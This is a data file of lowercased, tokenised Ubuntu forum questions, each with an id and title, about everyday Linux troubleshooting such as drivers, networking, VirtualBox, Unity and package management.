29731	rebind alt key to win using setxkbmap ?	after an hour or two of manpage and google searching and finding no solution or good resources , i 've come for help ! i have set my caps lock key to ctrl using setxkbmap -option ctrl : nocaps - this works perfectly fine . however , since i use [ awesome ] [ 1 ] , and an ibm model m which lacks the meta key , i need my left alt key to replace the windows key . using xkeycaps i was able to get this to work , except it killed my arrow keys and end . problematic . unfortunately , documentation on setxkbmap options are sparse . and i ca n't find the proper option to use . thanks for any links/solutions .
29732	activate `` f-lock '' key on start up	hardware : logitech access keyboard , ps2 , 867209-0102 i would love to be able to activate the `` f-lock '' key on start up ( using rc.local or so ) . xev did n't show me the key command - is there an other way to get the key command name ?
29733	no bios , no video after ubuntu updates	i am running ubuntu 10.04 on a dell precision t3500 desktop machine . last week , when i ran the regular updates , upon restart my video disappeared . i could not even see the dell startup screen or enter the bios . when i swapped out the video card ( for an older one i had around ) , the system worked again . so dell sent me a replacement video card . i put that in and everything appeared to be working again . then , i ran updates again , and the same thing happened . replacement video card appears to be broken . no startup messages , no bios , no video at all . does anyone know how ubuntu updates might be ruining the video cards ? the card that keeps `` breaking '' is an firepro mv2260 .
29738	1000baset/full supported and advertised but not working !	i 'm using a at3iont-i motherboard with integrated card . if i ethtool it to 1000 full duplex it wont work ! here is sudo ethtool eth0 : supported ports : [ tp ] supported link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/full supports auto-negotiation : yes advertised link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/full advertised pause frame use : symmetric receive-only advertised auto-negotiation : yes speed : 100mb/s duplex : full port : twisted pair phyad : 0 transceiver : internal auto-negotiation : on mdi-x : unknown supports wake-on : pumbg wake-on : g current message level : 0x00000033 ( 51 ) link detected : yes here is sudo lshw -c network : *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:04:00.0 logical name : eth0 version : 03 serial : bc : ae : c5:8b:7d:33 size : 100mb/s capacity : 1gb/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8168 driverversion=8.021.00-napi duplex=full ip=192.168.0.2 latency=0 link=yes multicast=yes port=twisted pair speed=100mb/s resources : irq:42 ioport : e800 ( size=256 ) memory : f8fff000-f8ffffff memory : f8ff8000-f8ffbfff memory : fbff0000-fbffffff and lspci -nn : 00:00.0 host bridge [ 0600 ] : nvidia corporation mcp79 host bridge [ 10de:0a82 ] ( rev b1 ) 00:00.1 ram memory [ 0500 ] : nvidia corporation mcp79 memory controller [ 10de:0a88 ] ( rev b1 ) 00:03.0 isa bridge [ 0601 ] : nvidia corporation mcp79 lpc bridge [ 10de:0aad ] ( rev b3 ) 00:03.1 ram memory [ 0500 ] : nvidia corporation mcp79 memory controller [ 10de:0aa4 ] ( rev b1 ) 00:03.2 smbus [ 0c05 ] : nvidia corporation mcp79 smbus [ 10de:0aa2 ] ( rev b1 ) 00:03.3 ram memory [ 0500 ] : nvidia corporation mcp79 memory controller [ 10de:0a89 ] ( rev b1 ) 00:03.5 co-processor [ 0b40 ] : nvidia corporation mcp79 co-processor [ 10de:0aa3 ] ( rev b1 ) 00:04.0 usb controller [ 0c03 ] : nvidia corporation mcp79 ohci usb 1.1 controller [ 10de:0aa5 ] ( rev b1 ) 00:04.1 usb controller [ 0c03 ] : nvidia corporation mcp79 ehci usb 2.0 controller [ 10de:0aa6 ] ( rev b1 ) 00:06.0 usb controller [ 0c03 ] : nvidia corporation mcp79 ohci usb 1.1 controller [ 10de:0aa7 ] ( rev b1 ) 00:06.1 usb controller [ 0c03 ] : nvidia corporation mcp79 ehci usb 2.0 controller [ 10de:0aa9 ] ( rev b1 ) 00:08.0 audio device [ 0403 ] : nvidia corporation mcp79 high definition audio [ 10de:0ac0 ] ( rev b1 ) 00:09.0 pci bridge [ 0604 ] : nvidia corporation mcp79 pci bridge [ 10de:0aab ] ( rev b1 ) 00:0b.0 raid bus controller [ 0104 ] : nvidia corporation mcp79 raid controller [ 10de:0abc ] ( rev b1 ) 00:0c.0 pci bridge [ 0604 ] : nvidia corporation mcp79 pci express bridge [ 10de:0ac4 ] ( rev b1 ) 00:10.0 pci bridge [ 0604 ] : nvidia corporation mcp79 pci express bridge [ 10de:0aa0 ] ( rev b1 ) 00:15.0 pci bridge [ 0604 ] : nvidia corporation mcp79 pci express bridge [ 10de:0ac6 ] ( rev b1 ) 03:00.0 vga compatible controller [ 0300 ] : nvidia corporation ion vga [ 10de:087d ] ( rev b1 ) 04:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 03 ) if i use code : sudo ethtool -s eth0 speed 1000 duplex full autoneg off then in ethtool speed is unknown and it does n't work ; if i set it via pre-up it wont work either ... please help ! ! thanks !
29740	what fibre cards can i use with ubuntu 10.04 lts server	what pcie based fibre cards can i use with ubuntu ? i have been trying to find a native fibre card which works with ubuntu server but am unable to . i would really appreciate any help you can point me towards if possible . thank you
29747	( idea ) add gubuntu ( pure gnome 3 ) to the list of ubuntu desktop version	ubuntu has announced his own 'shell ' called unity . i have the idea that ubuntu adds a new list for it 's desktop versions , with gubuntu , a pure gnome 3.0 edition of ubuntu ( just like kubuntu ) , so the entire list of ubuntu may be like this : ubuntu ( unity ) gubuntu ( pure gnome 3.0 ) kubuntu xubuntu lubuntu edubuntu ubuntu server edition actually , i prefer a version that looks like this : ubuntu unity edition ubuntu gnome edition ubuntu kde edition ubuntu xfce edition ubuntu lxde edition ubuntu education edition ubuntu server edition so , the name of ubuntu will be more unified and simple for all versions . what do you think ?
29750	apt method to get the latest nvidia driver	the nvidia driver that i got from ubuntu repository is 260.19.06 . i was having some problems with videos , so i checked the nvidia site , and the version available there was 260.19.44 . is there a way to get the same driver version using apt-get , or something similar , so that the driver remains managed ?
29752	keyboard not working on my lenovo s10 netbook	i tried to install ubuntu 10.10 on my lenovo s10 netbook . while installing , we have to add user name and password etc . but my keyboard does not support at that time . why ? also i installed trial version , at that time also my keyboard is not working . mouse works better . please guide
29754	wifi connection frequently dropping in hotspots and university campus , home wifi works fine	for some reason , my wifi connection frequently drops everywhere except at home . i did n't have this problem with windows 7 so i guess it 's not a hardware problem . my best guess so far is that my connection timeout is very low so if my connection is n't able to reach the router after a few second , the connection drops . is that likely to be the problem ? if so , how could i fix this ? otherwise , what would be an alternative cause for this strange behavior ? update : i just noticed my home connection is wep whereas my university connection is wpa .
29757	what can replace system monitoring in the top gnome panel in unity ?	i 'm used to have system monitoring in the top gnome panel : cpu , temperature , net , fan-speed . ( see screenshot below ) in unity , the top panel is locked for window name and global menu , so i ca n't add panel applets . so my question is : is there a way to replace this kind of system monitoring ( always visible , taking not much space ) in unity ?
29759	is there a foolproof and easy way of determining which debs meant for ubuntu will install on debian	i have used ubuntu for a long time , and have collected a lot of ubuntu .deb packages which i may need for future installs . most of these are grabbed from outdated or obsolete ppas or from outside official sources . i have a old system lying around , too old to run ubuntu , and i am mulling installing debian squeeze with ldxe or something to convert it into a file/print server . i know it is possible to install ubuntu debs on debian , but some will simply not install because of dependencies . is there a easy way to install ubuntu debs on debian ? how can i determine which will safely install and which have the potential to break the system ? is there a script for this ?
29762	read file into array	how can i read file in shell script , then assign each line to an variable that i can use later , , , ( am thinking in way to load an default setting from file ) i already try : process ( ) { } file= '' read -p `` please enter name of default file : `` file if [ ! -f $ file ] ; then echo `` $ file : does not exists `` exit 1 elif [ ! -r $ file ] ; then echo `` $ file : can not read `` fi exec 0 < `` $ file '' n=0 while read -r line do ( assign each line to an variable ) done
29764	softlink for a file on a remote machine	i want to create a softlink for a file between two servers . the file is present on a server 1 and a softlink should be created for it on server2 . how can i do that ?
29766	launch a program from application lens with the keyboard ?	i can open the application place with +a , i can type to search for a program , but i ca n't launch the program without using the mouse . maybe i do n't know , how to do , maybe it is not implementet yet , maybe there is no plan to implement that . what is true ? how can i launch a program , that 's not in the laucher , without the mouse ?
29767	should i run mod_fcgi or apc on a 512mb vps ?	considering that i run a low memory vps , should i configure apache to use mod_fcgi , php apc or both ? as i understand it , the apc will not be shared between processes so i wonder what would produce the best result on busy sites : mod_fcgi , apc or a combination ?
29771	how do i set up x-image-url for gnus ?	trying to follow the instructions here , i 'd like to be able to insert my picture in the 'from : ' header field , but i 'm at a loss .
29780	how i can change the reply-to address in evolution ?	when i send an e-mail with evolution the recipient reads , from mypopmail @ domain.com reply to mymail @ otherdomain.com i want to it like this from mymail @ domain.com reply to mymail @ domain.com how i can change this ?
29781	would like to put a calender on cloud	i would like to put a calender on our cloud so that our small team is able to connect wherever they are in the world . ideally it would be good if it could be the calender from thunderbird . i am not the tech person just a screen gnome and our man is currently deep under the flu . any suggestions to an illiterate like me would be welcomed . jack .
29782	trying network manager 's replacement connman	i 'm aware that network manager is going to be replaced by connman . how can i try it out ? edit i installed indicator-network and it 's dependencies , so how do use it ? oh , and i 'm on 10.10 's unity . edit got it to work with a reboot .
29783	so what is the reason behind the claim that you need at least as much swap area as main memory for hibernate to work ?	i saw a lot of recommendations claiming that for hibernation the swap partition/file must be at least as large as the main memory . this makes no sense to me . lets assume i have 8 gb of main memory and 8 gb swap area and want to hibernate : case 1 : i 'm using 4 gb of virtual memory - > 8 gb of swap is unnecessarily large . case 2 : i 'm using 8 gb of virtual memory - > 8 gb of swap is just right . case 3 : i 'm using 12 gb of virtual memory - > 8 gb of swap is too small . the outcome is : a swap area of size equal to the memory size is sufficient for hibernate iff it does n't get used for swapping at all . so what is the reason behind the claim that you need at least as much swap area as main memory for hibernate to work ? i know that virtual memory gets used for caching too , and that the cache may be simply discarded , but what happens to hibernation if a program allocates 12 gb of virtual memory ( given the above memory and swap sizes ) ?
29786	how can i take ubuntu certification exams online ? ( no dates , no information about exams also in courses )	how can i take ubuntu certification exams online ? no dates and no information about exams are specified . i want to take at least exam to this course : http : //shop.canonical.com/product_info.php ? products_id=481 but the information required , are not written within the provided link .
29787	how to play audio faster but keep pitch ?	is there an application for ubuntu that can play audio faster but maintain its pitch ? this is possible in windows using an application like powerdvd .
29788	google-chrome 10 stable crash on every page	i installed google-chrome today , when i open any page including askubuntu i got this error message . i see my memory usage is normal ( memory 56 % and swap 4.8 % ) also i reload and i go to another page same problem what is the problem ? the last dmesg output [ 26612.341865 ] lo : disabled privacy extensions [ 29651.852476 ] chrome [ 15472 ] general protection ip:1528e26 sp:7fff514a9dc0 error:0 in chrome [ 400000+3082000 ] [ 31447.190586 ] [ ufw block ] in=eth1 out= mac=00:1c:25 : a1 : e7:67:00:16:3e:28:5a : b7:08:00 src=172.23.100.6 dst=172.23.20.128 len=69 tos=0x00 prec=0x00 ttl=128 id=15939 proto=udp spt=4243 dpt=161 len=49 [ 31451.250190 ] [ ufw block ] in=eth1 out= mac=00:1c:25 : a1 : e7:67:00:16:3e:28:5a : b7:08:00 src=172.23.100.6 dst=172.23.20.128 len=69 tos=0x00 prec=0x00 ttl=128 id=16180 proto=udp spt=4243 dpt=161 len=49 [ 31454.260150 ] [ ufw block ] in=eth1 out= mac=00:1c:25 : a1 : e7:67:00:16:3e:28:5a : b7:08:00 src=172.23.100.6 dst=172.23.20.128 len=69 tos=0x00 prec=0x00 ttl=128 id=16322 proto=udp spt=4243 dpt=161 len=49 [ 31458.648164 ] [ ufw block ] in=eth1 out= mac=00:1c:25 : a1 : e7:67:00:16:3e:28:5a : b7:08:00 src=172.23.100.6 dst=172.23.20.128 len=69 tos=0x00 prec=0x00 ttl=128 id=16513 proto=udp spt=4243 dpt=161 len=49 [ 33124.300112 ] lo : disabled privacy extensions [ 33601.021406 ] skipping edid probe due to cached edid [ 34594.043501 ] chrome [ 15746 ] : segfault at 0 ip 0000000000d5cdd0 sp 00007fff5149ec20 error 6 in chrome [ 400000+3082000 ] [ 34597.395334 ] chrome [ 18112 ] general protection ip:17c85bf sp:7fff514aa4f0 error:0 in chrome [ 400000+3082000 ] [ 34616.786643 ] chrome [ 18124 ] : segfault at 1007 ip 00000000017c849f sp 00007fff514aabd0 error 4 in chrome [ 400000+3082000 ] [ 37277.436207 ] lo : disabled privacy extensions [ 38549.501390 ] e1000e : eth1 nic link is down [ 38551.122253 ] e1000e : eth1 nic link is up 100 mbps full duplex , flow control : rx/tx [ 38551.122263 ] e1000e 0000:00:19.0 : eth1 : 10/100 speed : disabling tso
29797	how can i extend the desktop onto an external monitor/projector ?	i 've plugged in a projector into my laptop and i 'm attempting to extend the desktop onto it ( so that i can run a full screen app on the projector and have the controls on my laptop ) . i 'm able to mirror the screens effectively ( it does this by default ) but i ca n't extend it . when i untick `` mirror screens '' and press apply it asks me to log out and then back in again but it goes back to mirroring the screens . i 'm able to extend desktop on to my external monitor at home , just not this projector . is there a manual way or other way to do this other that through monitors setting ? my computer model is dell studio 1555 : pentium dual core t4300 ( 2.1ghz,800mhz,1mb ) , 4096mb 800mhz ddr2 dual channel , 512 mb ati mobility radeon hd 4570 using the ati proprietary driver . my screen resolution is 1366x768 ( 16:9 ) the projector that it wont connect properly is a hitachi cpx3 . that page specifies that it 's especially designed for projectors that use 16:10 aspect ratio , but considering my external monitor at home uses 4:3 should the differences in aspect ratio matter or be causing this error ?
29799	i want a non admin user to install software . what commands do i need to add to sudoers ?	i want to edit the /etc/sudoers file so that a non-admin user can install software via the software center in linux mint 10 . the reason for this is that i want a user to have the capability to install programs , but not make any other configuration changes to the system . so far i have the following ( some of these may not make sense , i was just trying whatever i thought of ) username all= /usr/bin/aptitude username all= /usr/bin/dpkg username all= /usr/local/bin/apt-get username all= /usr/lib/linuxmint/mintupdate/mintupdate.py username all= /usr/bin/software-center username all= /usr/bin/synaptic so far , it allows me to do updates without asking for my password , but it will not let me install software without entering an admin password . i am aware of this question , how can i set the software center to install software for non-root users ? , but this goes the route of modifying the policykit , whereas i 'm interested in a sudo solution , because it seems a simpler way to go .
29805	error formatting volume with my microsd	error creating file system : helper exited with exit code 1 : can not open /dev/sdb1 : read-only file system this what i get when i try to format my microsd . how do i remove the read-only file system on the mmc with ubuntu , so i can format it ? . thanks .
29806	enable opengl in vlc	how do i enable opengl in vlc as video output . it 's not listed as a alternative .
29812	host virtual box hard disk on another partition	when i create a virtual drive using virtualbox , the space needed is used from the partition i have installed ubuntu on . can i change this so that i can use one of my other mounted partitions for this ?
29816	how to change resolution of the virtualbox ( ubuntu guest and host ) ?	how can i change the resolution in the virtualbox ( ubuntu guest and host ) ? i remember long time i ago i had used it and just by changing the guest system resolution it worked . but now it 's not working . any idea ? i 'm using virtualbox 3.1.6 and ubuntu 10.04 .
29821	applications in ubuntu 's installation environment	for installation , a linux session is loaded to the memory , so my questions are : what applications are executed during this session ? how can i add more applications to use ? related to this question .
29826	how do i update ubuntu packages from source ?	i 'd like to create an updated version of the network-manager-openconnect package in ubuntu . apparantely i need to get the latest package source : bzr branch lp : ~network-manager/network-manager/openconnect-ubuntu.head then what ? the package seems to have a way to update itself from the latest upstream code using git . but how do i get it to do that ?
29827	weird font hinting in firefox 4	i know this a recurrent topic but i just ca n't find a decent solution -- although i found one for chrome . just take look at the following screenshots : chrome 9 firefox 4 see the slight difference ? i ca n't identify the exact difference but i can tell fonts in chrome look smoother . here are my system preferences ( prefer to show a screenshot as i do n't know the exact translations in english ) : anyone got a solution ? thanks . update : from my point of view , it does n't seem to actually be a hinting problem . i 'd say firefox uses subpixel rendering instead of grayscale rendering . ( yet i ca n't find the setting in fontconfig ) but this is a subjective opinion , can you confirm ?
29831	how to speed up rsync/tar of large maildir ?	i have a very large maildir i am copying to a new machine ( over 100base-t ) with rsync . the progress is slow . very slow . like 1 mb/s slow . i think this is because it is a lot of small files that are being read in an order that essentially is random with respect to where the blocks are stored on disk , causing a massive seek storm . i get similar results when trying to tar the directory . is there a way to get rsync/tar to read in disk block order , or otherwise overcome this problem ? edit : i tried tar cf /dev/zero maildir/ and on the old system , this took 30 minutes ! on the new system when the rsync finally finished , the same test took 18 minutes . dumping the same directory on the old system took 8 minutes , and on the new system , dump -0f /dev/zero -b 1024 /home/psusi/maildir/ finished in only 30 seconds .
29832	how to make transmission download torrents behind a proxy ?	can anyone help me configure transmission to download torrent files behind a proxy ? i have http_proxy set in my .bashrc .
29836	wireshark showing no encryption in openvpn	i have cipher bf-cbc uncommented in both server and client and wireshark is listening to tap0 but it is not showing any encryption . am i doing something wrong here ?
29839	how to translate ubuntu one web ui ?	i would like to know if it is currently or will be possible to translate the ubuntu one web ui , because i know people , and i 'm sure there are lot of them , who do n't understand any english words , and so do n't use it . i really that think it is very important to make it translatable , to have it used by the most people possible .
29842	how do i add the svn add-on subclipse to eclipse ?	i am trying to install subclipse plugins for eclipse ide . i have installed it but on restart of the ide , it throws up the following error : failed to load javahl library . these are the errors that were encountered : no libsvnjavahl-1 in java.library.path no svnjavahl-1 in java.library.path no svnjavahl in java.library.path java.library.path = /usr/lib/jvm/java-6-sun-1.6.0.24/jre/lib/i386/client : /usr/lib/jvm/java-6-sun-1.6.0.24/jre/lib/i386 : :/usr/java/packages/lib/i386 : /lib : /usr/lib how do i get past this error ?
29844	where can i find a package for `` project looking glass '' ? ( `` the java desktop '' )	i really really want to find this package . because after i saw the youtube clip i realized it 's just one of those things i must have done before i die . this tutorial would be great if the repository were online . my question is : where can i find the file , and how can i install it without changing my current desktop ? the project was called `` project looking glass '' and was released in 2007 . it is now an `` inactive open source project '' , according to its wikipedia article . by using my answer i managed to make a boot able device and i had an error while booting so i will ask that question on http : //unix.stackexchange.com/ .
29849	steam ( via wine ) crashes after login - any troubleshooting tips ?	the steam client crashes after i login . after submitting my credentials , steam displays a dialog box informing me the client is 'connecting ' . i then see the steam main page and news page displayed for roughly a second or so before the client crashes . i 'm running ubuntu 10.10 ( i think..what 's the best way to verify ? uname only displays linux ) which i 've installed on a usb flash drive using a capser-rw file for persistence . wine-1.3.14 i 'm not sure how to troubleshoot . how do i identify if the problem is with wine or steam or the video card driver , or what ? any ideas ? hardware : motherboard : ecs elitegroup 945gct-m sound : integrated audio video : ati radeon x1950 console output : ubuntu @ ubuntu : ~/.wine/drive_c/program files/steam $ wine steam.exe fixme : process : getlogicalprocessorinformation ( ( nil ) ,0x32e488 ) : stub fixme : process : getlogicalprocessorinformation ( 0x1010c00,0x32e488 ) : stub fixme : process : setprocessshutdownparameters ( 00000100 , 00000000 ) : partial stub . fixme : urlmon : cointernetsetfeatureenabled 5 , 0x00000002 , 1 , stub fixme : urlmon : cointernetsetfeatureenabled 10 , 0x00000002 , 1 , stub fixme : dwmapi : dwmsetwindowattribute ( 0x1009a , 2 , 0x32d334 , 4 ) stub fixme : dwmapi : dwmsetwindowattribute ( 0x1009a , 3 , 0x32d338 , 4 ) stub fixme : dwmapi : dwmsetwindowattribute ( 0x1009a , 4 , 0x32d33c , 4 ) stub fixme : dwmapi : dwmsetwindowattribute ( 0x100a2 , 2 , 0x32d964 , 4 ) stub fixme : dwmapi : dwmsetwindowattribute ( 0x100a2 , 3 , 0x32d968 , 4 ) stub fixme : dwmapi : dwmsetwindowattribute ( 0x100a2 , 4 , 0x32d96c , 4 ) stub err : ole : cogetclassobject class { 77f10cf0-3db5-4966-b520-b7c54fd35ed6 } not registered err : ole : cogetclassobject no class object { 77f10cf0-3db5-4966-b520-b7c54fd35ed6 } could be created for context 0x1 fixme : wbemprox : wbem_locator_connectserver 0x1ab5f0 , l '' root\\cimv2 '' , ( null ) , ( null ) , ( null ) , 0x00000080 , ( null ) , ( nil ) , 0x42bbee8 ) fixme : dwmapi : dwmsetwindowattribute ( 0x100ae , 2 , 0x32d8cc , 4 ) stub fixme : dwmapi : dwmsetwindowattribute ( 0x100ae , 3 , 0x32d8d0 , 4 ) stub fixme : dwmapi : dwmsetwindowattribute ( 0x100ae , 4 , 0x32d8d4 , 4 ) stub fixme : dwmapi : dwmsetwindowattribute ( 0x100b6 , 2 , 0x32d80c , 4 ) stub fixme : dwmapi : dwmsetwindowattribute ( 0x100b6 , 3 , 0x32d810 , 4 ) stub fixme : dwmapi : dwmsetwindowattribute ( 0x100b6 , 4 , 0x32d814 , 4 ) stub fixme : dwmapi : dwmsetwindowattribute ( 0x100c0 , 2 , 0x32d2e4 , 4 ) stub fixme : dwmapi : dwmsetwindowattribute ( 0x100c0 , 3 , 0x32d2e8 , 4 ) stub fixme : dwmapi : dwmsetwindowattribute ( 0x100c0 , 4 , 0x32d2ec , 4 ) stub fixme : winhttp : winhttpgetieproxyconfigforcurrentuser returning no proxy used fixme : dwmapi : dwmsetwindowattribute ( 0x100dc , 2 , 0x32d94c , 4 ) stub fixme : dwmapi : dwmsetwindowattribute ( 0x100dc , 3 , 0x32d950 , 4 ) stub fixme : dwmapi : dwmsetwindowattribute ( 0x100dc , 4 , 0x32d954 , 4 ) stub fixme : dwmapi : dwmsetwindowattribute ( 0x10118 , 2 , 0x32da8c , 4 ) stub fixme : dwmapi : dwmsetwindowattribute ( 0x10118 , 3 , 0x32da90 , 4 ) stub fixme : dwmapi : dwmsetwindowattribute ( 0x10118 , 4 , 0x32da94 , 4 ) stub fixme : dwmapi : dwmsetwindowattribute ( 0x10122 , 2 , 0x32d514 , 4 ) stub fixme : dwmapi : dwmsetwindowattribute ( 0x10122 , 3 , 0x32d518 , 4 ) stub fixme : dwmapi : dwmsetwindowattribute ( 0x10122 , 4 , 0x32d51c , 4 ) stub fixme : dbghelp : elf_search_auxv ca n't find symbol in module
29850	ubuntu one triplicated my contacts -- how can i delete all contacts so i can start over ?	i need to delete all contacts in ubuntu one . doing this one at a time is excruciating and horrible . how can i just get rid of all contacts ?
29851	openvpn vs. ipsec - which one is faster for tunneling ?	complexity of installation of ipsec is not an issue . i would like to know which one will provide a faster connection for tunneling .
29855	ubuntu one stuck and doing nothing	ubuntu one has worked fine for me for several weeks and i now have 8.2 gb of files in the clouds . then , last night , ubuntu one stopped working . when i fire up system > preferences > ubuntu one , it tells me that i have 8.2 gb stored ( 13.2 % ) and that my status is unknown . i 've tried to restart to no avail . i even tried to remove , followed by clearing the password keyring and starting over . still nothing . i 've run out of buttons to push .
29856	how to build all my installed package from sources ?	i 've read about how source-based linux distros like gentoo can have considerable performance increases when compared to pre-built distros like ubuntu because they install from source with optimizations for your particular system . is is possible to build ubuntu from source to get the same kind of benefit ?
29863	mouse not clicking properly	okay guys , here 's a tricky one . i 'm running 10.10 on my pc but i 've had this issue for some time now.i 'm having strange issues with the mouse . what happens is when i get into ubuntu , i can click anything , but as soon as i click something to open a window , run a program , i can no longer click anything except the last thing i clicked . when i right click the last thing i clicked , it allows me to click everything normally , but only until i open something new . so for example i 'll click the email icon on docky to open up my email client , which opens but is unresponsive until i right click docky . then if i open an attatchment , i must also right click the menu bar on my email client . sometimes it also works if i simply right click on the newly opened window . i have tried this mith mutiple mice and still the same issue .
29866	increase the /home partition without losing the data	i have a 320 gb harddrive with three partitions / , /home and swap . what i want to do is change the size of swap which now is 8 gb to 5 gb and append that 3 gb to my /home partition . i have searched through the web for this but do n't seem to find a proper way to increase my home partition . can anyone help ? by the way , i know how to decrease size of swap i just need the proper way to append that unallocated 3 gb of space to my /home partition without loosing the data . thank you gparted from live-usb i ca n't increase my /home size
29867	how to make unity 2d workspace button trigger compiz expo view mode ?	i am using unity 2d with compiz . and i want the workspaces button to trigger the expo view mode in compiz . can anyone help me ?
29871	how can i change the cache mode of an usb drive ?	i 've installed ubuntu on a usb stick , which took about 2 hours . after booting from usb , the system was extreme slow , during write operations . the problem seems to be the cache mode [ sda ] assuming drive cache : write through . how can i change this during and after the installation ? which is the cache mode with the fewest/laziest write operations ?
29872	torrent client for the command-line ?	yesterday one of my friends asked me , if there is some torrent client , that runs on the command-line . i have no answer for him , but i think that you have it .
29877	os evaluate in bash script	i was thinking in way that before run my script , evaluate which operating system that user use ubuntu or solaris , am using this because there is some differences in command option in each os such as sed .. , i was trying the following : syseval=`grep `` ubuntu '' | uname -a` if [ syseval ] ; then ... ... .some command else ... ... . some command fi note that my script will run only in ubuntu or solaris seems not working !
29888	created bootable .iso on external usb hdd , how to get rid of it again ?	using the guide on ubuntu.com i installed the image of the netbook edition on my external hdd using pendrive on windows . i was not aware that it would create such a mess and now want to get rid of it again , still retaining my old files . how can i do that ?
29889	how do i check if my openpgp key is in the ubuntu keyserver ?	i 'm in the process of adding my openpgp key to launchpad and i just uploaded it to ubuntu 's keyserver . now i can only continue once the key is available through the keyserver . is there a way to check if that 's already the case ?
29891	how does apt-btrfs-snapshot work ?	i read on the planet that apt-btrfs-snapshot would be available for natty . the brief description of what it does sounds very nice : it will automatically create filesystem snapshot ( of everything but /home ) when apt installs/removes/upgrades . with the apt-btrfs-snapshot cli app its easy to list/remove/rollback the snapshots but before i convert my entire life to btrfs for the sole purpose of gaining a built-in backup system , can anybody tell me how btrfs 's snapshots work . to my layman 's brain , it sounds like this would eat a devastating amount of disk space if you 're taking snapshots every time you install or upgrade something ( i do this more than once a day ) . i assume the system is smarter than i 'm allowing it but i really do n't know . how do the snapshots work ?
29892	which changes can you make in unity ?	will it be possible to edit the panel in unity ? to add and remove apps ( weather , date , main-menu , shut-off-button ) . the main men端-button would save a lot of space instead of the normal men端-button . same with the shut-off-button . you can turn off the pc with 2 clicks instead of 3 clicks . will it be possible to change the positions of the panel and the unity-panel ? maybe both panels at the bottom . it would be user-friendly if changes would be possible ( individuality ) . will there always be a choice between unity and the old desktop design ?
29897	speaker icon in taskbar is missing	i 'm totally newbie to ubuntu after years of ms windows . please excuse my mitakes . the icon was located in gnome panel 2.30.2. and it adjust the level of sound .
29898	ffmpeg or gstreamer for command line conversion of audio files ?	i think i 'm mixing up and i need some one to clarify things for me ! what is the differences between gstreamer and ffmpeg . what i need is a command line to convert file ( s ) from one format to another . i know i can do that with installing ffmpeg but i read and i saw allot of talk about gstreamer . can i use it the same way ? if yes , which one is better ?
29903	what happened to the weather-app in the panel ?	it was so easy to show the weather in the panel , without installing an app . why wo n't that be possible anymore in 11.04 ?
29905	using versioning for settings in home ?	i planned to use git for the important files in my home directory , so i can revert bad settings or transfer them to another computer as needed . but there 's too much chaos there , with each program mixing wildly temporary files , caches , logs , backups , and everything . finding anything worth saving is hard , and when i 've found any settings done by myself , there were mixed with informations specific to the computer ( so i could hardly take them to another one ) and timestamps ( so tracking useful changes is hard ) . is anybody doing it or is it just hopeless and how to filter out the garbage ?
29909	how can i get chromium to download pdf files automatically ?	when i click on a pdf link on chromium i get a 'missing plug-in ' page . it used to be that it would download the pdf and then i could view it with evince . to do this now i have to right click and click 'save link as ... ' . how can i get this to happen when i click on the link ? this is what about : plugins looks like : i am using ubuntu 10.10 32bit with chromium 9.0.597.107 ( 75357 ) .
29918	how to trick apt dependencies ?	i want to use frescobaldi ( an editor for lilypond ) , but the packaged release of lilypond ( 2.12.3 ; lilypond is like tex for scoresheets ) in the official repos is a bit old , since i want to use some brand-new features . so i just cloned their git repo and installed it from there . now my question is , how can i tell apt , that i satisfied the dependency on lilypond manually , so that it does n't tries to install another copy ?
29923	will gnome3 offer a panel interface or just the shell ?	i recently read about next linux mint release using gnome3 but without the shell . does it mean the panel interface will be revisited ? if so , is it possible to build it for testing ?
29926	unity does not use the categories from the .desktop files	i installed the educational version of ubuntu with unity . this is for kids . the most important applications are the ones that the descriptions says are specially added for kids . trying to find them is a pain in the applications directory . they are organized in the main menu , but unity does not use the main menu information for anything . bottom line , i am now going to reinstall ubuntu and not include unity . the panels feature is nice , but there needs to some ability to organize the applications -- either with a menu or a directory structure that is read . the .desktop files indicate categories ... like education . why does unity not use this information ?
29927	how do i solve virtualbox error 0x80004005 ?	i was trying to run windows xp under virtual box ( host system ubuntu 10.04 ) and i 've got an error message saying : kernel driver not installed ( rc=-1908 ) the virtualbox linux kernel driver ( vboxdrv ) is either not loaded or there is a permission problem with /dev/vboxdrv . re-setup the kernel module by executing '/etc/init.d/vboxdrv setup' as root . users of ubuntu , fedora or mandriva should install the dkms package first . this package keeps track of linux kernel changes and recompiles the vboxdrv kernel module if necessary . this is terminal output : maria @ maria-laptop : ~ $ sudo /etc/init.d/vboxdrv setup * stopping virtualbox kernel modules * done . * uninstalling old virtualbox dkms kernel modules * done . * trying to register the virtualbox kernel modules using dkms * failed , trying without dkms * recompiling virtualbox kernel modules * done . * starting virtualbox kernel modules * done . after that i can run xp on virtual box , but when i try to log into user 's account , i have the message that i have to register xp ( i have n't done it yet , as each time i was cliking on pop-up window suggesting registration , nothing was happening ) . i click that i want to register it now and appears the message about error 0x80004005 , which prevents windows to check the license for that computer ( the message is in polish , so i do n't post it here ... ) . i forgot to install dkms first , but i 've done it after . what should i do to run virtual machine ? it was using it already , the problem occured only today . thanks for any suggestion
